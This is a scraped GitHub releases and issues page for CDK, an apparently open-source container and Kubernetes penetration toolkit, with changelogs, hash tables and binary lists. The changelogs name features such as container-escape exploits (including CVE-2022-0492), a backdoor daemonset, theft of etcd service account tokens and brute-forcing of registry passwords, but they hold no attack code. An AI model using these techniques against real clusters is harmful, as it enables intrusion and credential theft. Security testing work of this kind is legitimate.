    • To prebuild kernel modules for the most popular distributions (e.g. Ubuntu 20.04), include them in the CDK binary and leave a note on how to build a kernel module for other kernel versions.

    Great thanks to Nikita.

    enhancement 
    opened by neargle 4
  • [doc] document about thin version and upx version

    A document explaining the differences between the release binaries is needed (note to self; to be written soon).

    In the current major release we added a lightweight version, it’s prepared for short-life container shells such as Serverless functions. We add build tags in source code and cut a few exploits to make the binary lighter, just a 2MB file, but contains 90% of CDK functions, you may also pick up useful exploits in our CDK source code to build your own lightweight binary.


    documentation 
    opened by neargle 0
Releases(v1.4.1)
  • v1.4.1(Sep 19, 2022)

    Release Date: 2022-09-19

    :scroll: Changelog

    :mag: About Evaluate

    • Feat(evaluate): support check setuid files in path (#67)
    • More colorful in Evaluate

    :key: Hash Table


    What's Changed

    • Better eva - feat(evaluate): support check setuid files in path by @neargle in https://github.com/cdk-team/CDK/pull/67

    Full Changelog: https://github.com/cdk-team/CDK/compare/v1.4.0...v1.4.1

    Source code(tar.gz)
    Source code(zip)
    cdk_darwin_amd64(12.07 MB)
    cdk_linux_386(9.87 MB)
    cdk_linux_386_thin(4.89 MB)
    cdk_linux_386_thin_upx(2.07 MB)
    cdk_linux_386_upx(3.71 MB)
    cdk_linux_amd64(11.37 MB)
    cdk_linux_amd64_thin(5.79 MB)
    cdk_linux_amd64_thin_upx(2.25 MB)
    cdk_linux_amd64_upx(4.03 MB)
    cdk_linux_arm(9.87 MB)
    cdk_linux_arm64(10.62 MB)
    cdk_linux_arm64_thin(5.37 MB)
  • v1.4.0(Sep 4, 2022)

    Release Date: 2022-09-04

    :scroll: Changelog

    :bomb: Exploits

    • Perf(exp): add recommend message for lxcfs-rw and lxcfs-rw-cgroup exploit
    • Fix(exp): function undefined in macos
    • Feat(exp): support Exploit lxcfs-rw with cgroup release_agent

    :mag: About Evaluate

    • Feat(evaluate): output all mount info and more colorful (#64)
    • Perf(exp): add recommend message for lxcfs-rw and lxcfs-rw-cgroup exploit

    :sparkles: Others

    • Feat(evaluate): output all mount info and more colorful (#64)
    • Perf(exp) #62: add recommend message for lxcfs-rw and lxcfs-rw-cgroup
    • Feat(exp): support Exploit lxcfs-rw with cgroup release_agent
    • Test(fix): fix import circle in TestParseCDKMain

    What's Changed

    • feat(exp): support Exploit lxcfs-rw with cgroup release_agent by @lockedtang in https://github.com/cdk-team/CDK/pull/61
    • perf(exp): add recommend message for lxcfs-rw and lxcfs-rw-cgroup… by @neargle in https://github.com/cdk-team/CDK/pull/62
    • feat(evaluate): output all mount info and more colorful by @neargle in https://github.com/cdk-team/CDK/pull/64

    New Contributors

    • @lockedtang made their first contribution in https://github.com/cdk-team/CDK/pull/61

    Full Changelog: https://github.com/cdk-team/CDK/compare/v1.3.0...v1.4.0

    :key: Hash Table


    Source code(tar.gz)
    Source code(zip)
    cdk_darwin_amd64(12.07 MB)
    cdk_linux_386(9.87 MB)
    cdk_linux_386_thin(4.89 MB)
    cdk_linux_386_thin_upx(2.07 MB)
    cdk_linux_386_upx(3.71 MB)
    cdk_linux_amd64(11.36 MB)
    cdk_linux_amd64_thin(5.78 MB)
    cdk_linux_amd64_thin_upx(2.25 MB)
    cdk_linux_amd64_upx(4.18 MB)
    cdk_linux_arm(9.87 MB)
    cdk_linux_arm64(10.62 MB)
    cdk_linux_arm64_thin(5.37 MB)
  • v1.3.0(Jul 10, 2022)

    Release Date: 2022-07-10

    🔮 Support for some function on the kubelet. Waiting for July 18?

    :scroll: Changelog

    :bomb: Exploits

    • Test(main function): add unit test for ParseCDKMain
    • Feat(exp): support "Exploit container escape with kubelet log access & /var/log mount"
    • Feat(exp) (#55): Exploit a kubelet endpoint, default 10250

    :toolbox: Tools

    • Test(main function): add unit test for ParseCDKMain

    :sparkles: Others

    • Test(github action): add go test
    • Fix(network): support getgateway in linux container
    • Docs(readme): add Quick Start
    • Feat(network): get gateway in pods
    • Feat(exp) (#55): Exploit a kubelet endpoint, default 10250

    :key: Hash Table


    Contributor

    @neargle @404tk

    Full Changelog: https://github.com/cdk-team/CDK/compare/v1.2.0...v1.3.0

    Source code(tar.gz)
    Source code(zip)
    cdk_darwin_amd64(12.08 MB)
    cdk_linux_386(9.87 MB)
    cdk_linux_386_thin(4.88 MB)
    cdk_linux_386_thin_upx(2.07 MB)
    cdk_linux_386_upx(3.71 MB)
    cdk_linux_amd64(11.35 MB)
    cdk_linux_amd64_thin(5.78 MB)
    cdk_linux_amd64_thin_upx(2.24 MB)
    cdk_linux_amd64_upx(4.03 MB)
    cdk_linux_arm(9.87 MB)
    cdk_linux_arm64(10.62 MB)
    cdk_linux_arm64_thin(5.37 MB)
  • v1.2.0(Jun 25, 2022)

    Release Date: 2022-06-25

    ☑️ Release a new version in the hospital 💊.

    What's Changed

    • add etcd get k8s token by @404tk in https://github.com/cdk-team/CDK/pull/52
    • perf(probe): output ending message by @neargle in https://github.com/cdk-team/CDK/pull/53
    • Fix #49 (shadow-apiserver): Flag --insecure-port has been deprecated by @neargle in https://github.com/cdk-team/CDK/pull/50

    New Contributors

    • @404tk made their first contribution in https://github.com/cdk-team/CDK/pull/52
    • Thanks to @路飞 for privately reporting a bug; we fixed it in #49

    :scroll: Changelog

    :bomb: Exploits

    • Feat(etcd) #52: get K8s service account token in ETCD

    :toolbox: Tools

    • Feat(etcd) #52: get K8s service account token in ETCD
    • Perf(probe): output ending message

    :key: Hash Table

    |SHA256|EXECUTABLE FILE|
    |---|---|
    |139c41629e75329a9582b0a3ca07327a134860d4cc3686795a5fb69d09ee50aa|cdk_darwin_amd64|
    |1ff183ed7b15612ef77d444187d44d2e1d76df09fa1762c24c54ab45440c77b9|cdk_linux_386|
    |c8664d51b579d5922ab8325a777048d8d661baf2767744829becb979784f76d9|cdk_linux_386_thin|
    |eaa6c3fcb9e722d690183ae349ac2ca935aa9bcd2942f6f103fd8eb842dc5168|cdk_linux_386_thin_upx|
    |bb6ca78dc8a3774eb3db52580c52bc6b47ca885d9881f5cb422c915ca2c2a7a9|cdk_linux_386_upx|
    |5f62f9a20546e50fcb59aedca67b9fd9252c1c026ef81649bd9eb7366c4376aa|cdk_linux_amd64|
    |0e411f4a58f7ca4e77a39c810bd1cb44eca9f8cbae2a20d1c3ed6d3f1b9c4f81|cdk_linux_amd64_thin|
    |eec9b210d157d0ef16e7238c21bf66c6dd4806471853c3e976927f7be14ab918|cdk_linux_amd64_thin_upx|
    |131c1f2e3e3062392bece1caca144ef426920af8c8a54912f8ec23321a766b5a|cdk_linux_amd64_upx|
    |39f6d556d0567606d5763e60fecafeb3e5d16afd986c05602c06d2486d8d72c2|cdk_linux_arm|
    |cca9d8bb94c36f2e971f834b980801d3fefd23fd8a25852867bb1be94d116963|cdk_linux_arm64|
    |770e9e98e3ed07a224cbaf8fb78c5c9804b580f04470884cead4413616200621|cdk_linux_arm64_thin|

    Source code(tar.gz)
    Source code(zip)
    cdk_darwin_amd64(12.05 MB)
    cdk_linux_386(9.84 MB)
    cdk_linux_386_thin(4.86 MB)
    cdk_linux_386_thin_upx(2.06 MB)
    cdk_linux_386_upx(3.70 MB)
    cdk_linux_amd64(11.33 MB)
    cdk_linux_amd64_thin(5.75 MB)
    cdk_linux_amd64_thin_upx(2.24 MB)
    cdk_linux_amd64_upx(4.02 MB)
    cdk_linux_arm(9.87 MB)
    cdk_linux_arm64(10.62 MB)
    cdk_linux_arm64_thin(5.37 MB)
  • v1.1.1(Jun 12, 2022)

    Release Date: 2022-06-12

    :scroll: Changelog

    :bomb: Exploits

    • Fix #49(shadow-apiserver): Flag --insecure-port has been deprecated

    :toolbox: Tools

    • Fix(kcurl): more info for statuscode not in MaybeSuccessfulStatuscodeList

    :sparkles: Others

    • Fix(kcurl): more info for statuscode not in MaybeSuccessfulStatuscodeList
    • Fix #49(shadow-apiserver): Flag --insecure-port has been deprecated

    What's Changed

    • Fix #49 (shadow-apiserver): Flag --insecure-port has been deprecated by @neargle in https://github.com/cdk-team/CDK/pull/50

    Full Changelog: https://github.com/cdk-team/CDK/compare/v1.1.0...v1.1.1

    :key: Hash Table

    |SHA256|EXECUTABLE FILE|
    |---|---|
    |9ee370e295cb26ad1b06650144941dc380888d48e0c1ae446cdae7e00e055e82|cdk_darwin_amd64|
    |4c4b0e00d9620697ba7ef9ff00fd58022b9e39db23dc65348fce5d3a321000e6|cdk_linux_386|
    |697320ded8b271c975f6ff97a43eb7bc444cbe8648b8c5f34aa7652e14893306|cdk_linux_386_thin|
    |aa862e916af73e90f28c1407d5a411121cb33eeee5bf1bd2f130887b3dbdfd7f|cdk_linux_386_thin_upx|
    |56ab5129d379ec39c8037a5937b4ce5cf6680377786548df125b93473e67623a|cdk_linux_386_upx|
    |8880e4d7caf33e5da9a785d4c2da5bdcc6ba6315f882900f88c0adf1872e8fb8|cdk_linux_amd64|
    |9ed6afef63c00c3c4d2eb6003922a872f0125639201fdf2f04ce3ab3b991d2be|cdk_linux_amd64_thin|
    |336b7dca10b75274a81c04cdba1989781ad742e968ebd41e5f901e66f106204c|cdk_linux_amd64_thin_upx|
    |0956efa9072a03fddbe779da42e60df115e9d71bf9ac846ade8b751e4530b084|cdk_linux_amd64_upx|
    |f13668c26c13b4e0a8a56ffbc758331f311bcb033c1c74b1711a2258d6ed2e22|cdk_linux_arm|
    |fbebaaf3a90be35d2e00d1edf45b98799357f9321ff1b94ccfd2a22e44203052|cdk_linux_arm64|
    |5d4d311ed2ab95bbd9698cbd26c83ce62ee9a665c462ef9f6fcee2406ab795c4|cdk_linux_arm64_thin|

    Source code(tar.gz)
    Source code(zip)
    cdk_darwin_amd64(12.01 MB)
    cdk_linux_386(9.81 MB)
    cdk_linux_386_thin(4.73 MB)
    cdk_linux_386_thin_upx(2.01 MB)
    cdk_linux_386_upx(3.68 MB)
    cdk_linux_amd64(11.28 MB)
    cdk_linux_amd64_thin(5.59 MB)
    cdk_linux_amd64_thin_upx(2.17 MB)
    cdk_linux_amd64_upx(4.15 MB)
    cdk_linux_arm(9.75 MB)
    cdk_linux_arm64(10.62 MB)
    cdk_linux_arm64_thin(5.18 MB)
  • v1.1.0(May 30, 2022)

    Release Date: 2022-05-30

    :scroll: Changelog

    :bomb: Exploits

    • Chore(usage): ocd and CDK in banner title
    • Docs(LICENSE): to the Apache License v2 and add file header(K8s style)
    • Fix #46 (exp): add "run" to 3 exp desc document
    • Fix(exp): runc-pwn error /proc/pid dir path
    • Fix #44 (exp): k8s-psp-dump check args error
    • Fix #45 (exp): check cmdline exclude cdk process
    • Chore(utils): remove same function with StringContains
    • Chore(exp & release): build mount cgroup only in linux

    :mag: About Evaluate

    • Add DNS-Based Service Discovery
    • Perf(log): colorful usage
    • Docs(LICENSE): to the Apache License v2 and add file header(K8s style)
    • Feat(evaluate): get current pid cgroup info

    :toolbox: Tools

    • Docs(LICENSE): to the Apache License v2 and add file header(K8s style)

    :sparkles: Others

    • Docs(thanks): add contrib rocks img in readme
    • Chore(github action): run Evaluate, Exploit and Tool for test
    • Add DNS-Based Service Discovery
    • Fix(opt): docopt parse error
    • Chore(git): ignore vscode debug bin
    • Perf(log): colorful usage
    • Fix(action): del unnecessary build
    • Feat(evaluate): get current pid cgroup info
    • Fix(action): build cross-compiler in push & pull request
    • Chore(exp & release): build mount cgroup only in linux

    :key: Hash Table

    |SHA256|EXECUTABLE FILE|
    |---|---|
    |78012b117e06baee37f32962d1dbd603b02231d7c4117c577765ecbc245842d6|cdk_darwin_amd64|
    |f5b77a3b40d262907ae6c65822622a5d9852fcba0251b9ddc391e8e896ffec2b|cdk_linux_386|
    |259c9c57a74382b07c0a630b3094489b3aca263504b4fda79d3c20027e2a74fa|cdk_linux_386_thin|
    |e2c267e1e289e975e1a4a2acf13f30eb04dbb4a4da24daae02c248dbb199e919|cdk_linux_386_thin_upx|
    |a41520ae22cf2f079517745389a21e9f90df6376fb61bc4243808f8e494f08b1|cdk_linux_386_upx|
    |32cd84b8c8e4df09df5aaf0c310a954d18b2cc96aaea2ca524b79f381afd3e55|cdk_linux_amd64|
    |2a707260991123cf39ed723eaff4bf99db683ad35f58ad43c75c8fe2a5e9a4e7|cdk_linux_amd64_thin|
    |b45f9a6c21f34801656affa29c1633288fe44f859a120c3e1a69d3880ce4f617|cdk_linux_amd64_thin_upx|
    |3a87a1096cb7cd4dfeb7d8725aec180b68c3aab9393f50ebf0431cc7189b6d20|cdk_linux_amd64_upx|
    |c346565a022b0f0c4957c33226e8b7a3d3359f8da8eeb97e60b50d6d3e1dea79|cdk_linux_arm|
    |1392c9ae26021890c4fe0a3a960426da99e504d587b971408f40997d56e1ee63|cdk_linux_arm64|
    |1416d3d651adeb29acbc825d7d537a379fdcb78102c36842a876dcf29e76c0e8|cdk_linux_arm64_thin|

    New Contributors

    • @wywwzjj made their first contribution in https://github.com/cdk-team/CDK/pull/48

    Full Changelog: https://github.com/cdk-team/CDK/compare/v1.0.6...v1.1.0

    Source code(tar.gz)
    Source code(zip)
    cdk_darwin_amd64(12.01 MB)
    cdk_linux_386(9.81 MB)
    cdk_linux_386_thin(4.73 MB)
    cdk_linux_386_thin_upx(2.01 MB)
    cdk_linux_386_upx(3.68 MB)
    cdk_linux_amd64(11.28 MB)
    cdk_linux_amd64_thin(5.59 MB)
    cdk_linux_amd64_thin_upx(2.17 MB)
    cdk_linux_amd64_upx(4.01 MB)
    cdk_linux_arm(9.75 MB)
    cdk_linux_arm64(10.62 MB)
    cdk_linux_arm64_thin(5.18 MB)
  • v1.0.6(Mar 10, 2022)

    💣 Awesome CVE-2022-0492 Exploit!

    Release Date: 2022-03-10

    :scroll: Changelog

    :bomb: Exploits

    • Chore(exp & release): build mount cgroup only in linux
    • Fix(exp): unprivileged_userns_clone sysctl file does not exist in CentOS
    • Feat(exploit/abuse-unpriv-userns): exploit of CVE-2022-0492 (#41)
    • Feat(exp/mount_cgroup.go): completely fix #35 in golang-style
    • Fix #38 (exp): shim-pwn protobuf panic after run exploit

    :mag: About Evaluate

    • Feat(caps): find out add caps

    :sparkles: Others

    • Chore(cli): add version info & commit id for debug

    :key: Hash Table

    |SHA256|EXECUTABLE FILE|
    |---|---|
    |b5fb2c18b9720d0bfc5f0d25a9922b6f0b88230e1005664885391ef140d7d489|cdk_darwin_amd64|
    |371226668baa95b330676a6268145ad25bfc28f59710f35fc1888aa6b70a74a4|cdk_linux_386|
    |0bb79f2fe4c5f6d451822a26cff27b172270bce29d7430e01bebe904cde0c215|cdk_linux_386_thin|
    |fa7433173643095d5266fd465f88de45d6d157d72dc5915ab1334c03af63b4ba|cdk_linux_386_thin_upx|
    |0976936c3c02be348ea926ce86c7204c7e9e59a092477e924c1a1d5bd97cfced|cdk_linux_386_upx|
    |eae7c7548d28517d099afef1bc7664f098bfa3c533ee5a0cf763ab28480ebeeb|cdk_linux_amd64|
    |ebab27736848eb90409384d231b939702ce97482cc231aba7d0acf58e02db438|cdk_linux_amd64_thin|
    |72f7e33c5313aa5ab15b99778b1f3c4d50d4710b171a635994d0d01e47e8173b|cdk_linux_amd64_thin_upx|
    |d697ea397da7603417baaf232512864bd8ecedde47dd199c2d32f653619f0f3b|cdk_linux_amd64_upx|
    |cdf9041ba0603c7d7452a2866eee0eaa115ad5d8488d92c1c388c36d321301b1|cdk_linux_arm|
    |4f52fb4cf7dd744b01695e5356442182bc9fdb635da8f766537c12e0d83ad18f|cdk_linux_arm64|
    |68080b2cbfd4488f96e0c315ea7e8bf6204de010a05eeb2da621f78caa7254b9|cdk_linux_arm64_thin|

    PR

    • Implement mount-cgroup in Golang style by kmahyyg in https://github.com/cdk-team/CDK/pull/40
    • feat(exploit/abuse_unpriv_userns.go): exploit of CVE-2022-0492 by kmahyyg in https://github.com/cdk-team/CDK/pull/41

    New Contributors

    • @kmahyyg made their first contribution in https://github.com/cdk-team/CDK/pull/40

    Source code(tar.gz)
    Source code(zip)
    cdk_darwin_amd64(11.27 MB)
    cdk_linux_386(9.30 MB)
    cdk_linux_386_thin(4.58 MB)
    cdk_linux_386_thin_upx(1.93 MB)
    cdk_linux_386_upx(3.45 MB)
    cdk_linux_amd64(10.67 MB)
    cdk_linux_amd64_thin(5.40 MB)
    cdk_linux_amd64_thin_upx(2.09 MB)
    cdk_linux_amd64_upx(3.91 MB)
    cdk_linux_arm(9.31 MB)
    cdk_linux_arm64(10.00 MB)
    cdk_linux_arm64_thin(5.00 MB)
  • v1.0.5(Mar 6, 2022)

    💒 Happy wedding to my friend CDKKWANG, let's release a new version of CDK. 🌸 And fix some bugs by the way. Click to view more changelogs.

    Release Date: 2022-03-06

    :scroll: Changelog

    :bomb: Exploits

    • Fix #38 (exp): shim-pwn protobuf panic after run exploit

    :mag: About Evaluate

    • Feat(caps): find out add caps

    :sparkles: Others

    • Chore(cli): add version info & commit id for debug
    • Fix #38 (exp): shim-pwn protobuf panic after run exploit
    • Fix #37 (eva): add eva args to docopt
    • Chore: support for cdk eval
    • Feat(caps): find out add caps
    • Bump github.com/containerd/containerd from 1.4.11 to 1.4.12
    • Fix action: cedrickring/golang-action is archived, use the official actions/setup-go action instead
    • Fix action: apply in all push and pull request
    • Bump github.com/tidwall/gjson from 1.6.7 to 1.9.3
    • Add event: https://community.cncf.io/events/details/cncf-kcd-china-presents-kubernetes-community-days-china/
    • Github action: git build test after a new pull request and push

    :key: Hash Table

    |SHA256|EXECUTABLE FILE|
    |---|---|
    |0e17084a14b6af8e50ae4917261546121279fd94299bea1f5fcaa77f18a0feaf|cdk_darwin_amd64|
    |91cd0a590f86cbda8e33e5a4d90303f270ed6d17b8b36e50030f5a68beb7a704|cdk_linux_386|
    |31b9c5ce299981849c4ec0f90e6dac5a7b894c654eab1c3db4099744a5594e80|cdk_linux_386_thin|
    |e30443b3f19aafa06b3edb124228f6ac35aa51737c3eb78fa007ffdce9d75bc5|cdk_linux_386_thin_upx|
    |aedb680859401bdea82e17109b9d6bb7ec6cfc26bf20687c14eea15c616efb52|cdk_linux_386_upx|
    |c68ea57d7555c49ef4c5ea05363fe0ced7978e751331ea949005d70fff000a00|cdk_linux_amd64|
    |330253612d4c4a3791acfd82257d5a4c1e68ec989e0647abfa4baa560cf0a046|cdk_linux_amd64_thin|
    |a37e4ee0bb7651669d595d3bb44edd135f9d696648f36fb9e35af1e84ee6b795|cdk_linux_amd64_thin_upx|
    |356bdd6cb7c92146fcee5812aba9eb101ff713ff67768bafd59b6f33a5d61eae|cdk_linux_amd64_upx|
    |1b2c21dd0c747782c5b23b0ca390a23a17cb3fe437021c5f44e5d77d6b71f656|cdk_linux_arm|
    |2518c6ab5e78e0f644a5c406d84778eb45991564ba136c266d9696fc6996e8ef|cdk_linux_arm64|
    |a3995533605772461060559d6afae9de2726e86ef45a53bb924792fbe9baa325|cdk_linux_arm64_thin|

    Source code(tar.gz)
    Source code(zip)
    cdk_darwin_amd64(11.98 MB)
    cdk_linux_386(9.77 MB)
    cdk_linux_386_thin(4.69 MB)
    cdk_linux_386_thin_upx(1.99 MB)
    cdk_linux_386_upx(3.67 MB)
    cdk_linux_amd64(11.23 MB)
    cdk_linux_amd64_thin(5.54 MB)
    cdk_linux_amd64_thin_upx(2.16 MB)
    cdk_linux_amd64_upx(4.14 MB)
    cdk_linux_arm(9.75 MB)
    cdk_linux_arm64(10.50 MB)
    cdk_linux_arm64_thin(5.18 MB)
  • v1.0.4(Oct 2, 2021)

    Release Date: 2021-10-02

    :scroll: Changelog

    :bomb: Exploits

    • Fix DeployBackdoorDaemonset return true when error.
    • Fix build tag mistake in CapDacReadSearch Exploit
    • Better cap_dac_read_search exploit
    • Fix: HTTP authorization token has blank string in prefix or suffix
    • Add force-fuzz option for k8s-psp-dump exploit
    • Add filter string for lxcfs-rw exploit

    :mag: About Evaluate

    • Fix DeployBackdoorDaemonset return true when error.

    :toolbox: Tools

    • Fix DeployBackdoorDaemonset return true when error.
    • Fix: HTTP authorization token has blank string in prefix or suffix

    :sparkles: Others

    • Fix typo: KCON 2021 Arsenal
    • Add kcon2021 and whc2021
    • Format "run --list" output.
    • Add StringContains function
    • Add filter string for lxcfs-rw exploit
    • Bump github.com/containerd/containerd from 1.4.3 to 1.4.8

    :key: Hash Table

    |SHA256|EXECUTABLE FILE|
    |---|---|
    |1acd7ea1364e9c78d271cc8341ae804e8a6e143d4c31103d6dd5424dbc80498a|cdk_darwin_amd64|
    |2dd16e2f18bd45ff80eb56a524d3af4e87f55054fdb3ada3d2a097824b6487ac|cdk_linux_386|
    |c042f360a6deff1b41405dd0f5bee637fc8242d585c714410084ef068a90d9fc|cdk_linux_386_thin|
    |ba69953f7e76cb9a1d4992fbb7db913284d265e7d32f6659dd3527874a473404|cdk_linux_386_thin_upx|
    |35a4bba030e749de8667b0284982bd8d187a5ed9e1ced0b3c2e67136aa839cc7|cdk_linux_386_upx|
    |07d53bb25aaa1b6ed1de40f0b8999be20a399172e49876cac3600503793df581|cdk_linux_amd64|
    |9b1bcec7eb978a3412a5ec172181074837f08f4f9c256e8d9f6a8d7d2ce34d74|cdk_linux_amd64_thin|
    |9e8a97e342f21509bdba9c4abfdefafe5b3a4fc60c046415ad397eca356e5d04|cdk_linux_amd64_thin_upx|
    |fde15f9ac15ce720fff310f70bf5d36843516dbda4d98c9bfbcdec6ce44f28e8|cdk_linux_amd64_upx|
    |a41c1b9b2b36e65dc1d8f57a08165289f44ed287893c18146fa32953bc2949fe|cdk_linux_arm|
    |1d533c26001b29f11e09de0c350cab64faef97ea49a41f579d01b9ae74d2a0e9|cdk_linux_arm64|
    |21582bab4103dda43821915b76e96870431e1f2f59bc0135ba4700008abdaa32|cdk_linux_arm64_thin|

    Source code(tar.gz)
    Source code(zip)
    cdk_darwin_amd64(13.48 MB)
    cdk_linux_386(10.86 MB)
    cdk_linux_386_thin(4.69 MB)
    cdk_linux_386_thin_upx(1.99 MB)
    cdk_linux_386_upx(3.99 MB)
    cdk_linux_amd64(12.51 MB)
    cdk_linux_amd64_thin(5.54 MB)
    cdk_linux_amd64_thin_upx(2.16 MB)
    cdk_linux_amd64_upx(4.50 MB)
    cdk_linux_arm(10.75 MB)
    cdk_linux_arm64(11.68 MB)
    cdk_linux_arm64_thin(5.18 MB)
  • v1.0.3(Jul 8, 2021)

    Release Date: 2021-07-08

    :scroll: Changelog

    :bomb: Exploits

    • Add exploit: brute-force account and password cracking against a container image registry

    :sparkles: Others

    • Add documentation for the brute-force account and password cracking exploit
    • Add meta-data api url of ucloud PR #24
    • Auto changelog: move changelog generate code to bash script

    :key: Hash Table

    |SHA256|EXECUTABLE FILE|
    |---|---|
    |313d2e2dad28703bf74b58c71131036e978667067d0cf77217435f10ff50a7df|cdk_darwin_amd64|
    |51093bb7f3a947ed390aa2a560dbe91621379ef2125582249a5769aa5a58b379|cdk_linux_386|
    |f889cf4f3cf56e385114be1e91477a51f5022cafb7bcd5cfc8eb20704e82e9e0|cdk_linux_386_thin|
    |e01fee07234e35d11957d7ff65a5e2e7e0bac4a4ff061fd5b5d90a42701c1c49|cdk_linux_386_thin_upx|
    |bf07c8fc6c899e793274614b8a98565fbedba9516c437c7594fec9fa15dd4d41|cdk_linux_386_upx|
    |d2053465e2b96e8fb144090dd3cb1b7d02c1364f0d66eae234995c89c2f57c64|cdk_linux_amd64|
    |bd3e5f1a848ec10158f529073a346f56c08a18c1e4cbfa1a85714037fe1561fe|cdk_linux_amd64_thin|
    |4f188f89c92bb150c8b0b623d2041373b946a8920e97e464964ed79def029605|cdk_linux_amd64_thin_upx|
    |e443f79a4b00598ac5a5adc8826b605db24b6345ae1fb4180aa4f173152fffc0|cdk_linux_amd64_upx|
    |d57859e45a603966302841da3a61fa3e604a2ddd7be8bb2f1feb9bde74464061|cdk_linux_arm|
    |635640f232a519c71fbdd148bfef9ef8f9c61909106f2d458273fa07830b21ea|cdk_linux_arm64|
    |d650309e0c7cefdb0fd5c2f29e30282d0d2f1be44fc389158c5d011a987245b4|cdk_linux_arm64_thin|

    Source code(tar.gz)
    Source code(zip)
    cdk_darwin_amd64(11.95 MB)
    cdk_linux_386(9.75 MB)
    cdk_linux_386_thin(4.68 MB)
    cdk_linux_386_thin_upx(1.98 MB)
    cdk_linux_386_upx(3.66 MB)
    cdk_linux_amd64(11.21 MB)
    cdk_linux_amd64_thin(5.53 MB)
    cdk_linux_amd64_thin_upx(2.15 MB)
    cdk_linux_amd64_upx(4.12 MB)
    cdk_linux_arm(9.75 MB)
    cdk_linux_arm64(10.50 MB)
    cdk_linux_arm64_thin(5.18 MB)
  • v1.0.2(Jun 17, 2021)

    Release Date: 2021-06-17

    :scroll: Changelog

    :bomb: Exploits

    • Add CAP_DAC_READ_SEARCH exploit
    • Fix error when target mountpoint is not a directory
    • Add SYS_ADMIN check and format capability output
    • Fix: truncation or EOF when reading target file
    • Various supplements to cap-dac-read-search

    :mag: About Evaluate

    • More information about available Linux capabilities
    • Add SYS_ADMIN check and format capability output
    • Add check for CAP_SYS_MODULE and CAP_DAC_READ_SEARCH

    :sparkles: Others

    • Add meta-data api url of ucloud PR #24 from Alex-null/main
    • Auto changelog: move changelog generate code to bash script
    • Bash variables uppercase and add other changelogs
    • Changelog generation by automatic in github action
    • Add meta-data api url of Amazon Web Services Cloud
    • More information about available Linux capabilities
    • Add check for CAP_SYS_MODULE and CAP_DAC_READ_SEARCH
    • Add check for OpenStack metadata
    • Add CAP_DAC_READ_SEARCH exploit
    • Update release note format

    :key: Hash Table

    |SHA256|EXECUTABLE FILE|
    |---|---|
    |c6986103a201b81ebf196dd945c4bf5b1992b4fd8db03479d7be2595a5c467fc|cdk_darwin_amd64|
    |05776513007563031e633e1e5820914bfdcac5df19fe7fc93be680df32f75362|cdk_linux_386|
    |0c9a9c3ce08d379b81646f92d8cb90fbd3fb384e497a4388f4bc33f1c4c41a44|cdk_linux_386_thin|
    |080b84e655682e3b4cd130b009a6c838a4c96ea147796cf216ffe3ebbaa256b1|cdk_linux_386_thin_upx|
    |f4e3039aaa1670e865d77746b6facb72dd3f72d8b240a972a6d48611b0ff4219|cdk_linux_386_upx|
    |f4f23d5b522d8f58e46963452ce15087bcff3955bbea95306e24433dfeacbd3a|cdk_linux_amd64|
    |6112fed1a30fcd45861afdbd13a6888f5cbeb6c3711d8262d6248eb4941aa2da|cdk_linux_amd64_thin|
    |d0a793ba054cb2ce81173cdfed434c511aec8c631a3597d9581c191bc1525c2e|cdk_linux_amd64_thin_upx|
    |bbae26473d5ca41404788c5b58ab495e9b7fdd988986657be0e0505400047207|cdk_linux_amd64_upx|
    |11ae0608b6218b088dc3880ab366c93247bc33665a8a7f14b9da4d450e449dfe|cdk_linux_arm|
    |3e1e22f3efa5aa2e7da26e2e6e82468e20de8d593b748f2521cfaf78d9043a2a|cdk_linux_arm64|
    |a89e428291b7d4d870e2f24564c86bdaed721131926eeae10602c5b86295466c|cdk_linux_arm64_thin|

    Source code(tar.gz)
    Source code(zip)
    cdk_darwin_amd64(11.95 MB)
    cdk_linux_386(9.74 MB)
    cdk_linux_386_thin(4.67 MB)
    cdk_linux_386_thin_upx(1.98 MB)
    cdk_linux_386_upx(3.66 MB)
    cdk_linux_amd64(11.20 MB)
    cdk_linux_amd64_thin(5.52 MB)
    cdk_linux_amd64_thin_upx(2.15 MB)
    cdk_linux_amd64_upx(3.97 MB)
    cdk_linux_arm(9.75 MB)
    cdk_linux_arm64(10.50 MB)
    cdk_linux_arm64_thin(5.18 MB)
  • v1.0.1(Apr 14, 2021)

    Fixes

    • fit exploit k8s-backdoor-daemonset for k8s version >1.8. #13 @greenhandatsjtu
    • fit exploit k8s-shadow-apiserver for Tencent Cloud TKE cluster.

    |sha256|executable file|
    |---|---|
    |eca140e2de5725eeaa29ab48f86e1745ef0232aaafd04298eccb742e1241171b|cdk_darwin_amd64|
    |8956389a7a50dcf4b7ab221c1b91172e7f7fb298dbf43a8251abfb76334e7a4e|cdk_linux_386|
    |67e7e9e8a9ae97ff4a2f1878746be4c10af64f43867d2e9ead31470145c689b8|cdk_linux_386_thin|
    |72ce22f23461dffa813c1a36c37ae081664ee255cbaf0e4b87d5108ab3101df2|cdk_linux_386_thin_upx|
    |6efb691f0411b0e57b39c9efae1a55033cb8d5de3911d1ed120bf8787f395f1f|cdk_linux_386_upx|
    |7fe4d08596fc13f16ed9bc29345a09a153e7e006bad88289836092bfc0e1ff1d|cdk_linux_amd64|
    |db32aad6f38b4b0b38b65ba962eb9c256640324f01cef1d9e9eda4a32106a8a5|cdk_linux_amd64_thin|
    |0674724cfc3997eacbac08e11b5b416a818b1dab5c6be50861babdbf84c376ad|cdk_linux_amd64_thin_upx|
    |2bb27f59beed6f28e048b581de811a1443aa880dc8172f3156146c4cf782b68b|cdk_linux_amd64_upx|
    |d049e53c682c148dc71b1a794973ad8c782014f9f32836c72ad141d05d94f022|cdk_linux_arm|
    |6bd11a9b68e81660518ccc9888cf6ea1f2d85c5bb33857f543298c2386e07bdf|cdk_linux_arm64|
    |0f45809e1a640a7f54dd5211aff1b5239c310b0e81ddfb1244345ce6ec9d72e2|cdk_linux_arm64_thin|

    Source code(tar.gz)
    Source code(zip)
    cdk_darwin_amd64(11.94 MB)
    cdk_linux_386(9.73 MB)
    cdk_linux_386_thin(4.66 MB)
    cdk_linux_386_thin_upx(1.97 MB)
    cdk_linux_386_upx(3.65 MB)
    cdk_linux_amd64(11.18 MB)
    cdk_linux_amd64_thin(5.50 MB)
    cdk_linux_amd64_thin_upx(2.14 MB)
    cdk_linux_amd64_upx(3.97 MB)
    cdk_linux_arm(9.75 MB)
    cdk_linux_arm64(10.50 MB)
    cdk_linux_arm64_thin(5.12 MB)
  • v1.0(Apr 11, 2021)

    New features

    • Make capabilities information readable.
    • Update cgroup and hostname capabilities in the evaluate module.
    • Update rewrite-cgroup-devices exploit to make it more stable.
    • More ports for k8s service probe.
